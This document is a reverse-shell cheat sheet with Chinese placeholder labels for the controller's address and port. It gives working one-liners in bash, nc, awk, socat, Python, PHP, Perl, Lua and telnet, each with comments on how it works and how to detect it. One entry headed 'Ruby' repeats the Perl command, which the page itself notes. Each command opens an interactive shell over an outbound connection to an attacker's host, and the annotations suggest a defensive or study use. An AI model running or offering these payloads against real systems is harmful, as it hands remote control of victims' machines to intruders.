bash
# Starts an interactive bash (-i) whose stdout and stderr are redirected (>&)
# to a TCP connection opened through bash's /dev/tcp/HOST/PORT redirection
# path; 0>&1 then duplicates stdin from that same connection. The bracketed
# values are placeholders for the controller's address and listening port.
# Detection: /dev/tcp is interpreted by bash during redirection rather than
# read from the filesystem, so file-access monitoring will not show it. Look
# for "/dev/tcp/" in process command lines and for a shell whose descriptors
# 0-2 all point at one outbound socket. Egress filtering limits the reachable
# destinations.
bash -i >& /dev/tcp/[控制端IP]/[控制端监听Port] 0>&1
# Replaces the current shell process (exec) with /bin/sh. Stdin is opened
# from the /dev/tcp/HOST/PORT path, then stdout (1>&0) and stderr (2>&0) are
# duplicated from it, so all three descriptors share one TCP connection.
# Because exec is used, no child process is created; the calling shell itself
# becomes /bin/sh.
# NOTE(review): the /dev/tcp redirection is evaluated by the invoking shell,
# so this presumably requires that shell to be bash - confirm.
# Detection: an existing shell PID that suddenly has a socket on fds 0-2.
exec /bin/sh 0</dev/tcp/[控制端IP]/[控制端监听Port] 1>&0 2>&0
# Opens descriptor 5 read/write (<>) on a TCP connection in the current
# shell. cat then copies what arrives on fd 5 into a loop that reads one line
# at a time and runs it as a command, sending stdout and stderr back to fd 5.
# $line is expanded unquoted, so each received line is word-split and run as a
# simple command; it is not re-parsed as shell syntax. read is used without
# -r, so backslashes in the input are interpreted.
# Detection: a long-lived shell holding an extra socket descriptor, with a
# cat child reading from it and short-lived children writing to it.
exec 5<>/dev/tcp/[控制端IP]/[控制端监听Port];cat <&5 | while read line; do $line 2>&5 >&5;done
nc
# Connects to the controller's address and port and, through -e, has nc run
# /bin/bash with its input and output attached to that connection.
# NOTE(review): -e is not present in every netcat variant, so whether this
# runs depends on which nc is installed on the host.
# Detection: an nc process whose arguments include -e and a shell path, or a
# bash process whose parent is nc. Removing unneeded netcat builds from
# servers takes this option away.
nc -e /bin/bash [控制端IP] [控制端监听Port]
awk
# Uses the "/inet/tcp/0/HOST/PORT" special file name together with the |&
# two-way pipe operator to hold a TCP connection in the variable s (these are
# gawk extensions, so a gawk-compatible awk is presumably required).
# The outer for loop reads one line from the connection into c. The inner
# while loop runs c as a command (c|getline) and prints every output line back
# to the connection. close(c) runs after each command and close(s) when the
# connection ends.
# Detection: an awk/gawk process with an outbound TCP connection that spawns
# shell children, or a command line containing "/inet/tcp/".
awk 'BEGIN{s="/inet/tcp/0/[控制端IP]/[控制端监听Port]";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'
socat
# Joins two socat addresses. The first runs 'bash -li' (login, interactive)
# as a child with the options pty, stderr, setsid, sigint and sane. The second
# is an outbound TCP connection to the controller's address and port. The pty
# option gives the bash child a pseudo-terminal instead of plain pipes.
# Detection: a socat command line that pairs an exec: address with a tcp:
# address, and a bash child of socat attached to a pty.
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:[控制端IP]:[控制端监听Port]
Python
# Inline Python: creates an IPv4 TCP socket, connects it to the controller,
# and copies the socket's descriptor onto 0, 1 and 2 with os.dup2. It then
# runs '/bin/bash -i' through subprocess.call, so bash inherits the socket as
# stdin, stdout and stderr. The call blocks until bash exits.
# Detection: "python -c" command lines containing both socket and dup2, and a
# bash child of a python process whose standard descriptors are one socket.
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('[控制端IP]',[控制端监听Port]));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
PHP
# Inline PHP: opens a TCP stream with fsockopen, then calls exec() to start
# '/bin/sh -i' with stdin, stdout and stderr redirected to descriptor 3.
# NOTE(review): $sock is never referenced again. The command assumes the new
# socket is file descriptor 3, and nothing on the line checks that.
# Detection: a php process spawning '/bin/sh -i'. PHP's disable_functions
# setting can block exec() where the application does not need it.
php -r '$sock=fsockopen("[控制端IP]",[控制端监听Port]);exec("/bin/sh -i <&3 >&3 2>&3");'
Perl
# Inline Perl using the Socket module: creates a TCP socket S and, only if
# connect() succeeds, reopens STDIN, STDOUT and STDERR as duplicates of S
# before exec'ing '/bin/sh -i'. The exec replaces the perl process with the
# shell. If the connection fails, nothing else runs.
# Detection: "perl -e" command lines containing "use Socket" and exec, and a
# /bin/sh process whose standard descriptors are a single outbound socket.
perl -e 'use Socket;$i="[控制端IP]";$p=[控制端监听Port];socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Ruby
# NOTE(review): this entry sits under the "Ruby" heading, but it invokes perl
# and is identical to the command under the "Perl" heading. The page contains
# no Ruby command.
# Behaviour as written: creates a TCP socket S with the Socket module and, if
# connect() succeeds, duplicates S onto STDIN, STDOUT and STDERR before
# exec'ing '/bin/sh -i'.
perl -e 'use Socket;$i="[控制端IP]";$p=[控制端监听Port];socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Lua
# Inline Lua: loads a 'socket' module (presumably LuaSocket, which is not part
# of stock Lua - confirm), opens a TCP connection with the port passed as a
# string, then runs '/bin/sh -i' via os.execute with stdin, stdout and stderr
# redirected to descriptor 3.
# NOTE(review): as with the PHP entry, the command assumes the socket is file
# descriptor 3. The connection object t is not referenced after connect().
# Detection: a lua process with an outbound TCP connection spawning
# '/bin/sh -i'.
lua -e "require('socket');require('os');t=socket.tcp();t:connect('[控制端IP]','[控制端监听Port]');os.execute('/bin/sh -i <&3 >&3 2>&3');"
Telnet
# Three-stage pipeline using two separate TCP connections. The first telnet
# receives text from Port1 and pipes it into /bin/bash. The stdout of bash is
# piped into a second telnet connected to Port2. Only stdout is piped, so
# bash's stderr is not sent over either connection.
# Detection: two concurrent telnet clients to the same remote address on
# different ports, with a bash process between them in one pipeline.
telnet [控制端IP] [控制端监听Port1] | /bin/bash | telnet [控制端IP] [控制端监听Port2] # On the attacking host, listen on Port1 and Port2 separately; after the reverse-shell command runs, commands are typed in the Port1 terminal and their output is viewed on Port2